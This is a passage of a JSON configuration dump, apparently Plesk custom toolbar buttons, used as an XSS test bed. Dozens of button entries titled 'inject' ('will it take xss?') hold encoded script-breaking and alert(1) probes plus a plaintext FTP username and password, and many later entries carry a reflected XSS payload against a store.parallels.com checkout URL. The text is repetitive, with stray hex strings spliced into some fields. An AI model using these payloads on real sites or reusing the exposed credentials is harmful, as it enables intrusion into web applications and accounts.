xss?","icon":"\/images\/custom_buttons\/{0-bb4cc840-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"c936f%253c%252fScRiPt%2520%253e2cdf6c3b534?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd4ef140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00c936f<\/ScRiPt%20>2cdf6c3b534?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bf2b0440-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"83b38%2522%253b79ac1f4c99d?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-df4b32e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"683d4%2522%252dalert%25281%2529%252d%25225babbed5232?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e2689f80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a881a%2522%253bcc41ad8a12?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e47910c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"e1a57%255c%2522%253b30bc91affda?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e5e08060-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"3336f%2522%252dalert%25281%2529%252d%25224d488d471d0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e7f35300-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e83f7f00-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a2d56%253c%252fscript%253ebca635fbfb?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-e9a22be0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00a2d56<\/script>bca635fbfb?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb17e3c0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7764%255c%2522%253b55ff7405d87?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eb4c4200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ec62c2e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ed6d5ce0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564%253c%252fScRiPt%2520%253e32fe847420e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ed9a9700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4%253c%252fscript%253e060a7d1f2c0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeaeb680-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0040564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeea38e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-effbf700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ca12f%2527%253b35fe7f9ef49?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f0fd0b80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f13fb200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7%253c%252fScRiPt%2520%253ec28bafc4b33?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f28a9120-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f4050bc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a812b%2527%252dalert%25281%2529%252d%25270d7822b344b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f40e9140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7d63%2527%253b2f26f55ca59?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f7bf9320-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"8692e%255c%2527%253b0d203c8e729?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f9ba9800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b28c2%2527%252dalert%25281%2529%252d%252752a751e644d?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc6a8560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc909b60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e%253c%252fscript%253ecf16d55fc95?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fde50000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0088f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ff1f3580-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"5b27d%255c%2527%253b1ce9a941be4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ff4a0e40-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0067b340-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0150fa00-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3%253c%252fScRiPt%2520%253e4a0c2054c2b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-01be7940-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7%253c%252fscript%253e351654a9214?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-028d90e0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%002b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-02f64d60-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-03cc8920-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0506bea0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8%253c%252fScRiPt%2520%253ec493568736e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0639d000-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0035df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0771a420-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9bd966e1de55578fb","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9b2b0696f832ad89","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"fdf080d92d642275e0dcc88a","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9f5a4b605e4d1d3e","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS 